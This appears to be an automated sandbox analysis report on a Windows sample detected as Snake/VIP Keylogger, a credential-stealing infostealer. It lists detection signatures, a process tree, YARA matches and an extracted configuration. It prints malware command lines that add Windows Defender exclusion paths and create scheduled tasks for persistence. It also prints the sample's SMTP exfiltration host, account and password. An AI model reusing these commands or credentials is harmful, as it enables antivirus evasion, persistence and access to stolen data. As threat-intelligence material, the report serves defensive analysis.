Edit tour

Windows Analysis Report
e-dekont_html.exe

Overview

General Information

Sample name:	e-dekont_html.exe
Analysis ID:	1608223
MD5:	880267e7b0dac545e1eb0f4c68038532
SHA1:	44bbbe3d07e732148cec1304630736bbe829bef0
SHA256:	97d2ac9df49a698cbe55f68068a93604206580f9696c8bf319d55c2e637c9727
Tags:	exegeoMassLoggerTURuser-abuse_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

Adds a directory exclusion to Windows Defender

Contains functionality to capture screen (.Net source)

Contains functionality to log keystrokes (.Net Source)

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

e-dekont_html.exe (PID: 7624 cmdline: "C:\Users\user\Desktop\e-dekont_html.exe" MD5: 880267E7B0DAC545E1EB0F4C68038532)

powershell.exe (PID: 7848 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

conhost.exe (PID: 720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7912 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 5500 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 7944 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HvgRSvNGGXnNtV" /XML "C:\Users\user\AppData\Local\Temp\tmpE95B.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

e-dekont_html.exe (PID: 8128 cmdline: "C:\Users\user\Desktop\e-dekont_html.exe" MD5: 880267E7B0DAC545E1EB0F4C68038532)

HvgRSvNGGXnNtV.exe (PID: 2064 cmdline: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe MD5: 880267E7B0DAC545E1EB0F4C68038532)

schtasks.exe (PID: 6500 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HvgRSvNGGXnNtV" /XML "C:\Users\user\AppData\Local\Temp\tmpFE1C.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 6764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

HvgRSvNGGXnNtV.exe (PID: 7468 cmdline: "C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe" MD5: 880267E7B0DAC545E1EB0F4C68038532)

HvgRSvNGGXnNtV.exe (PID: 7508 cmdline: "C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe" MD5: 880267E7B0DAC545E1EB0F4C68038532)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000010.00000002.3790644713.0000000002981000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000010.00000002.3785666315.000000000043D000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000002.3785666315.000000000042A000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000010.00000002.3785666315.000000000042A000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000010.00000002.3785666315.000000000042A000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x5aa0:$a1: get_encryptedPassword 0x6028:$a2: get_encryptedUsername 0x5713:$a3: get_timePasswordChanged 0x582a:$a4: get_passwordField 0x5ab6:$a5: set_encryptedPassword 0x87d2:$a6: get_passwords 0x8b66:$a7: get_logins 0x87be:$a8: GetOutlookPasswords 0x8177:$a9: StartKeylogger 0x8abf:$a10: KeyLoggerEventArgs 0x8217:$a11: KeyLoggerEventArgsEventHandler
00000000.00000002.1367919376.0000000004357000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1367919376.0000000004357000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.1367919376.0000000004357000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1367919376.0000000004357000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2ebb8:$a1: get_encryptedPassword 0x71bd8:$a1: get_encryptedPassword 0xb49f8:$a1: get_encryptedPassword 0x2f140:$a2: get_encryptedUsername 0x72160:$a2: get_encryptedUsername 0xb4f80:$a2: get_encryptedUsername 0x2e82b:$a3: get_timePasswordChanged 0x7184b:$a3: get_timePasswordChanged 0xb466b:$a3: get_timePasswordChanged 0x2e942:$a4: get_passwordField 0x71962:$a4: get_passwordField 0xb4782:$a4: get_passwordField 0x2ebce:$a5: set_encryptedPassword 0x71bee:$a5: set_encryptedPassword 0xb4a0e:$a5: set_encryptedPassword 0x318ea:$a6: get_passwords 0x7490a:$a6: get_passwords 0xb772a:$a6: get_passwords 0x31c7e:$a7: get_logins 0x74c9e:$a7: get_logins 0xb7abe:$a7: get_logins
0000000A.00000002.3789902160.0000000003231000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000B.00000002.1406301542.0000000004349000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.1406301542.0000000004349000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000B.00000002.1406301542.0000000004349000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000B.00000002.1406301542.0000000004349000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2de10:$a1: get_encryptedPassword 0x70e30:$a1: get_encryptedPassword 0xb3c50:$a1: get_encryptedPassword 0x2e398:$a2: get_encryptedUsername 0x713b8:$a2: get_encryptedUsername 0xb41d8:$a2: get_encryptedUsername 0x2da83:$a3: get_timePasswordChanged 0x70aa3:$a3: get_timePasswordChanged 0xb38c3:$a3: get_timePasswordChanged 0x2db9a:$a4: get_passwordField 0x70bba:$a4: get_passwordField 0xb39da:$a4: get_passwordField 0x2de26:$a5: set_encryptedPassword 0x70e46:$a5: set_encryptedPassword 0xb3c66:$a5: set_encryptedPassword 0x30b42:$a6: get_passwords 0x73b62:$a6: get_passwords 0xb6982:$a6: get_passwords 0x30ed6:$a7: get_logins 0x73ef6:$a7: get_logins 0xb6d16:$a7: get_logins
Process Memory Space: e-dekont_html.exe PID: 7624	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: e-dekont_html.exe PID: 7624	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: e-dekont_html.exe PID: 7624	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: e-dekont_html.exe PID: 7624	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: e-dekont_html.exe PID: 7624	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x41ca4:$a1: get_encryptedPassword 0x42222:$a2: get_encryptedUsername 0x41926:$a3: get_timePasswordChanged 0x41a3d:$a4: get_passwordField 0x41cba:$a5: set_encryptedPassword 0x4497e:$a6: get_passwords 0x44d0e:$a7: get_logins 0x4496a:$a8: GetOutlookPasswords 0x44323:$a9: StartKeylogger 0x44c67:$a10: KeyLoggerEventArgs 0x443c3:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: e-dekont_html.exe PID: 8128	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: e-dekont_html.exe PID: 8128	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: HvgRSvNGGXnNtV.exe PID: 2064	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: HvgRSvNGGXnNtV.exe PID: 2064	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: HvgRSvNGGXnNtV.exe PID: 2064	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: HvgRSvNGGXnNtV.exe PID: 2064	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: HvgRSvNGGXnNtV.exe PID: 2064	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x27ad2:$a1: get_encryptedPassword 0x28050:$a2: get_encryptedUsername 0x27754:$a3: get_timePasswordChanged 0x2786b:$a4: get_passwordField 0x27ae8:$a5: set_encryptedPassword 0x2a7ac:$a6: get_passwords 0x2ab3c:$a7: get_logins 0x2a798:$a8: GetOutlookPasswords 0x2a151:$a9: StartKeylogger 0x2aa95:$a10: KeyLoggerEventArgs 0x2a1f1:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: HvgRSvNGGXnNtV.exe PID: 7508	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: HvgRSvNGGXnNtV.exe PID: 7508	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: HvgRSvNGGXnNtV.exe PID: 7508	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: HvgRSvNGGXnNtV.exe PID: 7508	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xb8416:$a1: get_encryptedPassword 0xb8994:$a2: get_encryptedUsername 0xb8098:$a3: get_timePasswordChanged 0xb81af:$a4: get_passwordField 0xb842c:$a5: set_encryptedPassword 0xbb0f0:$a6: get_passwords 0xbb480:$a7: get_logins 0xbb0dc:$a8: GetOutlookPasswords 0xbaa95:$a9: StartKeylogger 0xbb3d9:$a10: KeyLoggerEventArgs 0xbab35:$a11: KeyLoggerEventArgsEventHandler
Click to see the 25 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
11.2.HvgRSvNGGXnNtV.exe.4349170.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.HvgRSvNGGXnNtV.exe.4349170.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
11.2.HvgRSvNGGXnNtV.exe.4349170.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.HvgRSvNGGXnNtV.exe.4349170.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bea0:$a1: get_encryptedPassword 0x2c428:$a2: get_encryptedUsername 0x2bb13:$a3: get_timePasswordChanged 0x2bc2a:$a4: get_passwordField 0x2beb6:$a5: set_encryptedPassword 0x2ebd2:$a6: get_passwords 0x2ef66:$a7: get_logins 0x2ebbe:$a8: GetOutlookPasswords 0x2e577:$a9: StartKeylogger 0x2eebf:$a10: KeyLoggerEventArgs 0x2e617:$a11: KeyLoggerEventArgsEventHandler
11.2.HvgRSvNGGXnNtV.exe.4349170.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3948e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38b31:$a3: \Google\Chrome\User Data\Default\Login Data 0x38d8e:$a4: \Orbitum\User Data\Default\Login Data 0x3976d:$a5: \Kometa\User Data\Default\Login Data
11.2.HvgRSvNGGXnNtV.exe.4349170.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d264:$s1: UnHook 0x2d26b:$s2: SetHook 0x2d273:$s3: CallNextHook 0x2d280:$s4: _hook
11.2.HvgRSvNGGXnNtV.exe.438c190.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.HvgRSvNGGXnNtV.exe.438c190.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
11.2.HvgRSvNGGXnNtV.exe.438c190.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.e-dekont_html.exe.4357f18.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.e-dekont_html.exe.4357f18.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.e-dekont_html.exe.4357f18.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.e-dekont_html.exe.439af38.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.e-dekont_html.exe.439af38.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.e-dekont_html.exe.439af38.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.HvgRSvNGGXnNtV.exe.438c190.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bea0:$a1: get_encryptedPassword 0x2c428:$a2: get_encryptedUsername 0x2bb13:$a3: get_timePasswordChanged 0x2bc2a:$a4: get_passwordField 0x2beb6:$a5: set_encryptedPassword 0x2ebd2:$a6: get_passwords 0x2ef66:$a7: get_logins 0x2ebbe:$a8: GetOutlookPasswords 0x2e577:$a9: StartKeylogger 0x2eebf:$a10: KeyLoggerEventArgs 0x2e617:$a11: KeyLoggerEventArgsEventHandler
0.2.e-dekont_html.exe.4357f18.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bea0:$a1: get_encryptedPassword 0x2c428:$a2: get_encryptedUsername 0x2bb13:$a3: get_timePasswordChanged 0x2bc2a:$a4: get_passwordField 0x2beb6:$a5: set_encryptedPassword 0x2ebd2:$a6: get_passwords 0x2ef66:$a7: get_logins 0x2ebbe:$a8: GetOutlookPasswords 0x2e577:$a9: StartKeylogger 0x2eebf:$a10: KeyLoggerEventArgs 0x2e617:$a11: KeyLoggerEventArgsEventHandler
0.2.e-dekont_html.exe.439af38.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bea0:$a1: get_encryptedPassword 0x2c428:$a2: get_encryptedUsername 0x2bb13:$a3: get_timePasswordChanged 0x2bc2a:$a4: get_passwordField 0x2beb6:$a5: set_encryptedPassword 0x2ebd2:$a6: get_passwords 0x2ef66:$a7: get_logins 0x2ebbe:$a8: GetOutlookPasswords 0x2e577:$a9: StartKeylogger 0x2eebf:$a10: KeyLoggerEventArgs 0x2e617:$a11: KeyLoggerEventArgsEventHandler
0.2.e-dekont_html.exe.4357f18.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3948e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38b31:$a3: \Google\Chrome\User Data\Default\Login Data 0x38d8e:$a4: \Orbitum\User Data\Default\Login Data 0x3976d:$a5: \Kometa\User Data\Default\Login Data
11.2.HvgRSvNGGXnNtV.exe.438c190.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3948e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38b31:$a3: \Google\Chrome\User Data\Default\Login Data 0x38d8e:$a4: \Orbitum\User Data\Default\Login Data 0x3976d:$a5: \Kometa\User Data\Default\Login Data
0.2.e-dekont_html.exe.439af38.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3948e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38b31:$a3: \Google\Chrome\User Data\Default\Login Data 0x38d8e:$a4: \Orbitum\User Data\Default\Login Data 0x3976d:$a5: \Kometa\User Data\Default\Login Data
0.2.e-dekont_html.exe.439af38.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d264:$s1: UnHook 0x2d26b:$s2: SetHook 0x2d273:$s3: CallNextHook 0x2d280:$s4: _hook
11.2.HvgRSvNGGXnNtV.exe.438c190.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.HvgRSvNGGXnNtV.exe.438c190.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
11.2.HvgRSvNGGXnNtV.exe.438c190.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
11.2.HvgRSvNGGXnNtV.exe.438c190.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.e-dekont_html.exe.439af38.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.e-dekont_html.exe.439af38.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.e-dekont_html.exe.439af38.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.e-dekont_html.exe.439af38.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.e-dekont_html.exe.4357f18.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d264:$s1: UnHook 0x2d26b:$s2: SetHook 0x2d273:$s3: CallNextHook 0x2d280:$s4: _hook
11.2.HvgRSvNGGXnNtV.exe.438c190.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d264:$s1: UnHook 0x2d26b:$s2: SetHook 0x2d273:$s3: CallNextHook 0x2d280:$s4: _hook
0.2.e-dekont_html.exe.439af38.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x70ac0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x71048:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x70733:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x7084a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x70ad6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x737f2:$a6: get_passwords 0x30d66:$a7: get_logins 0x73b86:$a7: get_logins 0x309be:$a8: GetOutlookPasswords 0x737de:$a8: GetOutlookPasswords 0x30377:$a9: StartKeylogger 0x73197:$a9: StartKeylogger 0x30cbf:$a10: KeyLoggerEventArgs 0x73adf:$a10: KeyLoggerEventArgs 0x30417:$a11: KeyLoggerEventArgsEventHandler
11.2.HvgRSvNGGXnNtV.exe.438c190.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x70ac0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x71048:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x70733:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x7084a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x70ad6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x737f2:$a6: get_passwords 0x30d66:$a7: get_logins 0x73b86:$a7: get_logins 0x309be:$a8: GetOutlookPasswords 0x737de:$a8: GetOutlookPasswords 0x30377:$a9: StartKeylogger 0x73197:$a9: StartKeylogger 0x30cbf:$a10: KeyLoggerEventArgs 0x73adf:$a10: KeyLoggerEventArgs 0x30417:$a11: KeyLoggerEventArgsEventHandler
0.2.e-dekont_html.exe.439af38.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b28e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7e0ae:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a931:$a3: \Google\Chrome\User Data\Default\Login Data 0x7d751:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ab8e:$a4: \Orbitum\User Data\Default\Login Data 0x7d9ae:$a4: \Orbitum\User Data\Default\Login Data 0x3b56d:$a5: \Kometa\User Data\Default\Login Data 0x7e38d:$a5: \Kometa\User Data\Default\Login Data
11.2.HvgRSvNGGXnNtV.exe.438c190.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b28e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7e0ae:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a931:$a3: \Google\Chrome\User Data\Default\Login Data 0x7d751:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ab8e:$a4: \Orbitum\User Data\Default\Login Data 0x7d9ae:$a4: \Orbitum\User Data\Default\Login Data 0x3b56d:$a5: \Kometa\User Data\Default\Login Data 0x7e38d:$a5: \Kometa\User Data\Default\Login Data
0.2.e-dekont_html.exe.439af38.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x71e84:$s1: UnHook 0x2f06b:$s2: SetHook 0x71e8b:$s2: SetHook 0x2f073:$s3: CallNextHook 0x71e93:$s3: CallNextHook 0x2f080:$s4: _hook 0x71ea0:$s4: _hook
11.2.HvgRSvNGGXnNtV.exe.438c190.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x71e84:$s1: UnHook 0x2f06b:$s2: SetHook 0x71e8b:$s2: SetHook 0x2f073:$s3: CallNextHook 0x71e93:$s3: CallNextHook 0x2f080:$s4: _hook 0x71ea0:$s4: _hook
11.2.HvgRSvNGGXnNtV.exe.4349170.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.HvgRSvNGGXnNtV.exe.4349170.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
11.2.HvgRSvNGGXnNtV.exe.4349170.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
11.2.HvgRSvNGGXnNtV.exe.4349170.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.e-dekont_html.exe.4357f18.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.e-dekont_html.exe.4357f18.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.e-dekont_html.exe.4357f18.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.e-dekont_html.exe.4357f18.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.HvgRSvNGGXnNtV.exe.4349170.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x70cc0:$a1: get_encryptedPassword 0xb3ae0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x71248:$a2: get_encryptedUsername 0xb4068:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x70933:$a3: get_timePasswordChanged 0xb3753:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x70a4a:$a4: get_passwordField 0xb386a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x70cd6:$a5: set_encryptedPassword 0xb3af6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x739f2:$a6: get_passwords 0xb6812:$a6: get_passwords 0x30d66:$a7: get_logins 0x73d86:$a7: get_logins 0xb6ba6:$a7: get_logins
0.2.e-dekont_html.exe.4357f18.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x70cc0:$a1: get_encryptedPassword 0xb3ae0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x71248:$a2: get_encryptedUsername 0xb4068:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x70933:$a3: get_timePasswordChanged 0xb3753:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x70a4a:$a4: get_passwordField 0xb386a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x70cd6:$a5: set_encryptedPassword 0xb3af6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x739f2:$a6: get_passwords 0xb6812:$a6: get_passwords 0x30d66:$a7: get_logins 0x73d86:$a7: get_logins 0xb6ba6:$a7: get_logins
11.2.HvgRSvNGGXnNtV.exe.4349170.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b28e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7e2ae:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xc10ce:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a931:$a3: \Google\Chrome\User Data\Default\Login Data 0x7d951:$a3: \Google\Chrome\User Data\Default\Login Data 0xc0771:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ab8e:$a4: \Orbitum\User Data\Default\Login Data 0x7dbae:$a4: \Orbitum\User Data\Default\Login Data 0xc09ce:$a4: \Orbitum\User Data\Default\Login Data 0x3b56d:$a5: \Kometa\User Data\Default\Login Data 0x7e58d:$a5: \Kometa\User Data\Default\Login Data 0xc13ad:$a5: \Kometa\User Data\Default\Login Data
